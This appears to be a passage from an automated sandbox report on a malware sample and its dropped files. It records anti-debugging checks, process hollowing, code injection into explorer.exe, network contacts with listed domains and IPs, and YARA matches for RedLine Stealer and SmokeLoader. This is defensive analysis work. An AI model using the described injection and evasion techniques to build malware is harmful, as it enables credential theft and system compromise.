                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_00666090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_00669930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_00669BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_00669D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe System information queried: ModuleInformation

                      Anti Debugging:

                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe System information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Roaming\iscgwer System information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exe System information queried: CodeIntegrityInformation
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe Code function: 0_2_0042D800 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe Code function: 0_2_00630042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe Code function: 0_2_008E5A4A push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Roaming\iscgwer Code function: 16_2_00560042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exe Code function: 20_2_00630042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exe Code function: 20_2_00855A4A push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_00401000 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_0040C180 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_0066092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_00661250 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_0066C3D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_00660D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe Process queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\iscgwer Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exe Process queried: DebugPort
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe Code function: 0_2_0043B850 IsDebuggerPresent,DebuggerProbe,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Code function: 24_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe Code function: 0_2_0042CC02 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe Code function: 0_2_00419D0A SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringA,SetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exe Code function: 22_1_004027ED LdrLoadDll,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe Memory protected: page guard
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe Code function: 0_2_0043AC10 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe Code function: 0_2_00422CF0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe Code function: 0_2_0042BD40 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe Code function: 0_2_004285A0 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\411E.exe Code function: 19_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exe Code function: 25_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeDomain query: privacy-tools-for-you-780.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Benign windows process drops PE filesShow sources
                      Source: C:\Windows\explorer.exeFile created: FE11.exe.11.drJump to dropped file
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\iscgwer | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\iscgwer | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Injects a PE file into a foreign process
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Memory written: C:\Users\user\Desktop\9ro85QVN0F.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\iscgwer | Memory written: C:\Users\user\AppData\Roaming\iscgwer base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exe | Memory written: C:\Users\user\AppData\Local\Temp\53DC.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Memory written: unknown base: 400000 value starts with: 4D5A
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Code function: 0_2_00630110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Thread created: C:\Windows\explorer.exe EIP: 4DE1930
                      Source: C:\Users\user\AppData\Roaming\iscgwer | Thread created: unknown EIP: 5C11930
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exe | Thread created: unknown EIP: 76B1930
                      Sample uses process hollowing technique
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Section unmapped: unknown base address: 400000
                      .NET source code references suspicious native API functions
                      Source: FD6B.exe.11.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: FD6B.exe.11.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 26.0.FD6B.exe.cf0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 26.0.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 26.2.FD6B.exe.cf0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 26.2.FD6B.exe.cf0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 26.0.FD6B.exe.cf0000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 26.0.FD6B.exe.cf0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 26.0.FD6B.exe.cf0000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 26.0.FD6B.exe.cf0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 26.0.FD6B.exe.cf0000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 26.0.FD6B.exe.cf0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 42.0.FD6B.exe.1a0000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 42.0.FD6B.exe.1a0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 42.0.FD6B.exe.1a0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 42.0.FD6B.exe.1a0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Process created: C:\Users\user\Desktop\9ro85QVN0F.exe "C:\Users\user\Desktop\9ro85QVN0F.exe"
                      Source: C:\Users\user\AppData\Roaming\iscgwer | Process created: C:\Users\user\AppData\Roaming\iscgwer C:\Users\user\AppData\Roaming\iscgwer
                      Source: C:\Users\user\AppData\Local\Temp\53DC.exe | Process created: C:\Users\user\AppData\Local\Temp\53DC.exe C:\Users\user\AppData\Local\Temp\53DC.exe
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Process created: C:\Users\user\AppData\Local\Temp\FD6B.exe C:\Users\user\AppData\Local\Temp\FD6B.exe
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Process created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exe | Code function: 25_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exe | Code function: 25_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                      Source: svchost.exe, 00000005.00000002.603968353.0000024F8A590000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295106186.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.310569887.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.325380041.00000000011E0000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.398375265.0000000000CC0000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.399497404.0000000000CC0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
                      Source: explorer.exe, 0000000B.00000000.294942686.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.324899097.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.310179991.0000000000B68000.00000004.00000020.sdmp | Binary or memory string: Progman\Pr
                      Source: svchost.exe, 00000005.00000002.603968353.0000024F8A590000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295106186.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.296692205.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.310569887.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.325380041.00000000011E0000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.398375265.0000000000CC0000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.399497404.0000000000CC0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: svchost.exe, 00000005.00000002.603968353.0000024F8A590000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295106186.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.310569887.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.325380041.00000000011E0000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.398375265.0000000000CC0000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.399497404.0000000000CC0000.00000002.00020000.sdmp | Binary or memory string: Progman
                      Source: svchost.exe, 00000005.00000002.603968353.0000024F8A590000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295106186.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.310569887.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.325380041.00000000011E0000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.398375265.0000000000CC0000.00000002.00020000.sdmp, 411E.exe, 00000013.00000000.399497404.0000000000CC0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
                      Source: explorer.exe, 0000000B.00000000.300102238.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.318596931.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.331623884.0000000008778000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWndh
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Code function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\411E.exe | Code function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\FD6B.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FD6B.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Code function: 0_2_00419F6B __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetProcessVersion,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameW,GetOverlappedResult,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,GetOverlappedResult,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionStringA,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleW,EndUpdateResourceW,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                      Source: C:\Users\user\AppData\Local\Temp\E6C4.exe | Code function: 24_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                      Source: C:\Users\user\AppData\Local\Temp\F4CF.exe | Code function: 25_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                      Source: C:\Users\user\Desktop\9ro85QVN0F.exe | Code function: 0_2_00419F6B __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetProcessVersion,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameW,GetOverlappedResult,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,GetOverlappedResult,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionStringA,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleW,EndUpdateResourceW,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      Changes security center settings (notifications, updates, antivirus, firewall)
                      Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 00000008.00000002.578114912.000001DFEBA40000.00000004.00000001.sdmp | Binary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 00000008.00000002.574956646.000001DFEBA29000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.582634282.000001DFEBB02000.00000004.00000001.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      Yara detected RedLine Stealer
                      Source: Yara match | File source: 26.2.FD6B.exe.436ba90.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.FD6B.exe.422f910.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.FD6B.exe.436ba90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.FD6B.exe.422f910.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000001A.00000002.474578999.0000000004111000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001A.00000002.474770371.0000000004281000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected SmokeLoader
                      Source: Yara match | File source: 17.0.iscgwer.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 17.0.iscgwer.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.0.53DC.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.0.53DC.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 17.0.iscgwer.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.0.53DC.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.9ro85QVN0F.exe.6315a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.2.53DC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 20.2.53DC.exe.6315a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.1.9ro85QVN0F.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 17.1.iscgwer.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.1.53DC.exe.400000.0.unpack, type: UNPACKEDPE
